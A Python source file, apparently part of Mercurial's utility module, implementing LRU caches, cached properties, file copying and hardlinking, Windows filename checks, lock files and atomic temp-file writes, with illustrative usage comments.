    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

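# A minimal sketch of a transactional subclass (editor's addition; the
# ``demotx`` type is hypothetical). __exit__ only close()s on success and
# always release()s:
#
#   >>> class demotx(transactional):
#   ...     def close(self):
#   ...         print('committed')
#   ...     def release(self):
#   ...         print('released')
#   >>> with demotx():
#   ...     pass
#   committed
#   released
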
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

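# Sketch of acceptintervention (editor's addition; ``demotr`` stands in
# for a real transaction object). Unlike a bare try/finally around a
# transaction, the transaction is closed, not aborted, even when
# InterventionRequired propagates:
#
#   >>> class demotr(object):
#   ...     def close(self):
#   ...         print('closed')
#   ...     def release(self):
#   ...         print('released')
#   >>> with acceptintervention(demotr()):
#   ...     pass
#   closed
#   released
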
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value', u'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """
    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                self.totalcost -= node.cost
                del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        node = self._cache.pop(k)
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev

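# Illustrative behavior of lrucachedict (editor's addition): eviction by
# capacity follows recency of use, and a maxcost limit can evict entries
# even below capacity:
#
#   >>> d = lrucachedict(2)
#   >>> d[b'a'] = 1
#   >>> d[b'b'] = 2
#   >>> d[b'a']                        # touch b'a'; b'b' is now the oldest
#   1
#   >>> d[b'c'] = 3                    # at capacity: evicts b'b'
#   >>> b'b' in d
#   False
#   >>> dc = lrucachedict(4, maxcost=10)
#   >>> dc.insert(b'x', b'v', cost=6)
#   >>> dc.insert(b'y', b'v', cost=6)  # total cost 12 > 10: b'x' evicted
#   >>> b'x' in dc, dc.totalcost
#   (False, 6)
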
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

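# Sketch of lrucachefunc (editor's addition; ``double`` is hypothetical).
# Unlike cachefunc, the cache is bounded and evicts old entries in
# least-recently-used order:
#
#   >>> calls = []
#   >>> def double(x):
#   ...     calls.append(x)
#   ...     return x * 2
#   >>> cached = lrucachefunc(double)
#   >>> cached(2), cached(2), calls
#   (4, 4, [2])
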
class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

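# Sketch of propertycache (editor's addition; ``repoinfo`` is a
# hypothetical class). The first access computes and stores the value in
# the instance __dict__; since this is a non-data descriptor, later
# accesses bypass it entirely:
#
#   >>> class repoinfo(object):
#   ...     @propertycache
#   ...     def expensive(self):
#   ...         print('computing')
#   ...         return 42
#   >>> r = repoinfo()
#   >>> r.expensive
#   computing
#   42
#   >>> r.expensive                    # served from r.__dict__
#   42
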
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]

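# Continuing the hypothetical ``repoinfo`` sketch above (editor's
# addition): callers typically pass the property name as bytes, and the
# sysstr() cast makes it match the native-str key that propertycache
# stored, notably on Python 3:
#
#   >>> clearcachedproperty(r, b'expensive')
#   >>> r.expensive                    # recomputed on next access
#   computing
#   42
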
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

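# Worked example of increasingchunks (editor's addition): 500-byte input
# chunks are coalesced into buffers whose minimum size roughly doubles
# after each yield until the cap is reached:
#
#   >>> chunks = [b'x' * 500] * 10
#   >>> [len(c) for c in increasingchunks(iter(chunks), min=1024, max=4096)]
#   [1500, 2500, 1000]
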
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7. But it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

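# Sketch of nogc as a decorator (editor's addition; ``buildbig`` is
# hypothetical). GC is suspended only for the duration of the call, and
# on PyPy the decorator is a no-op per the override above:
#
#   >>> @nogc
#   ... def buildbig():
#   ...     return {i: (i, i + 1) for i in range(1000)}
#   >>> len(buildbig())
#   1000
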
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

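# Worked example of pathto (editor's addition; output shown assuming a
# POSIX os.sep of '/'). With n1 relative to root, the shared leading
# components are stripped and the remainder is bridged with '..':
#
#   >>> pathto(b'/repo', b'a/b', b'a/c/d')
#   '../c/d'
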
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    with posixfile(pathname, 'rb') as fp:
        return fp.read()

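# Sketch of the lock round-trip (editor's addition; b'some.lck' is a
# hypothetical path). Where os.symlink exists, the info is encoded as
# the link target; otherwise it is written to a regular file, and
# readlock falls back to reading the file contents:
#
#   >>> makelock(b'host:12345', b'some.lck')
#   >>> readlock(b'some.lck')
#   'host:12345'
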
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

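# Sketch of the module-level ``re`` helper (editor's addition; output
# shown assuming the stdlib fallback, i.e. re2 is not installed).
# compile transparently prefers re2 when the flags are limited to
# IGNORECASE/MULTILINE, else falls back to remod:
#
#   >>> pat = re.compile(br'^\d+$', remod.IGNORECASE)
#   >>> bool(pat.match(b'12345'))
#   True
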
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk", which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

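# Illustrative usage (editorial sketch, not part of the module): recover
# the on-disk spelling of a user-supplied path on a case-insensitive
# filesystem. The paths below are hypothetical; both arguments must
# already be normcase-ed, and root must be an existing directory.
#
#   name = normcase(b'foo/readme.txt')
#   root = normcase(b'/repo/root')
#   fspath(name, root)   # -> e.g. b'Foo/README.txt', the stored spelling
#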
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

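# Illustrative usage (editorial sketch, not part of the module): probe a
# store directory before trusting hardlink counts for copy decisions.
# The path is hypothetical.
#
#   if checknlink(b'/repo/.hg/store/00changelog.i'):
#       # nlinks() can be trusted for files in this directory
#       ...
#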
def endswithsep(path):
    '''Check whether path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    meant as an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

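# Illustrative usage (editorial sketch, not part of the module): the
# write-to-temp-then-rename pattern this helper supports. The file name
# is hypothetical; rename() and posixfile() are this module's platform
# helpers.
#
#   temp = mktempcopy(b'data.bin', emptyok=True)
#   fp = posixfile(temp, 'wb')
#   fp.write(b'new contents')
#   fp.close()
#   rename(temp, b'data.bin')   # atomically replace the original
#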
class filestat(object):
    """Helper to exactly detect changes of a file

    The 'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists. Otherwise, it is None. This avoids a preparatory
    'exists()' examination on the client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        a change hidden by such colliding mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity if a process doesn't have
        appropriate privileges for 'path', and returns False in that
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

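# Illustrative usage (editorial sketch, not part of the module): decide
# whether a cache file changed between two reads, and nudge the mtime
# when the comparison would be ambiguous. The path is hypothetical.
#
#   before = filestat.frompath(b'cachefile')
#   # ... rewrite b'cachefile' ...
#   after = filestat.frompath(b'cachefile')
#   if after.isambig(before):
#       after.avoidambig(b'cachefile', before)
#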
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat,
    and is useful only if the target file is guarded by a lock
    (e.g. repo.lock or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

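# Illustrative usage (editorial sketch, not part of the module): as a
# context manager, readers never observe a half-written file. The file
# name is hypothetical.
#
#   with atomictempfile(b'state', mode='wb', checkambig=True) as fp:
#       fp.write(b'line 1\n')
#       fp.write(b'line 2\n')
#   # normal exit renames the temp file over b'state';
#   # an exception discards it instead
#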
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

